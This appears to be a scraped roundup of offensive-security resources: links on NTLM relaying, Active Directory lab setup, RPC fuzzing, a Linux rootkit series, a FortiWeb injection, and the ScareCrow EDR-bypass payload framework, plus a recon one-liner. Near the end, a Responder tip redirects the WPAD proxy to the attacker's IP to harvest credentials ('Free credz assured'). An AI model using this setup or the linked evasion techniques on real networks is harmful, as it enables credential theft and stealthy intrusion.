NTLM Relaying via Cobalt Strike – Rasta Mouse
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
If you are an Active Directory security practitioner, or if you are just getting started learning about Active Directory, this is a good resource to fill your domain with accounts and objects in a lab environment.
https://github.com/davidprowe/BadBlood
BadBlood by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world....
Fuzzing Windows RPC with RpcView | itm4n's blog
https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.
Resolve domains into IP addresses:
cat subdomain.txt | xargs dig | grep A | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" >> liveip.txt
Linux Rootkits:
Part 1 - Introduction and Workflow
https://xcellerator.github.io/posts/linux_rootkits_01
Part 2 - Ftrace and Function Hooking
https://xcellerator.github.io/posts/linux_rootkits_02
Part 3 - A Backdoor to Root
https://xcellerator.github.io/posts/linux_rootkits_03
Part 4 - Backdooring PRNGs by Interfering with Char Dev.
https://xcellerator.github.io/posts/linux_rootkits_04
Part 5 - Hiding Kernel Modules from Userspace
https://xcellerator.github.io/posts/linux_rootkits_05
Part 6 - Hiding Directories
https://xcellerator.github.io/posts/linux_rootkits_06
Part 7 - Hiding Processes
https://xcellerator.github.io/posts/linux_rootkits_07
Part 8 - Hiding Open Ports
https://xcellerator.github.io/posts/linux_rootkits_08
Part 9 - Hiding Logged In Users
https://xcellerator.github.io/posts/linux_rootkits_09
Linux Rootkits Part 1: Introduction and Workflow :: TheXcellerator
Learning about Linux rootkits is a great way to learn more about how the kernel works. What’s great about it is that, unless you really understand what the kernel is doing, your rootkit is unlikely to work, so it serves as a fantastic verifier.
In the FreeBSD…
Fortinet FortiWeb OS Command Injection | Rapid7 Blog
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
When using the DHCP module, make sure to edit Responder.conf WPAD's noscript.
"return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141;" -->
"return 'PROXY *Your-IP*:3128; PROXY *Your-IP*:3141;"
Also, Responder should be run this way:
./Responder.py -I eth0 -rPvd
Free credz assured :)
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow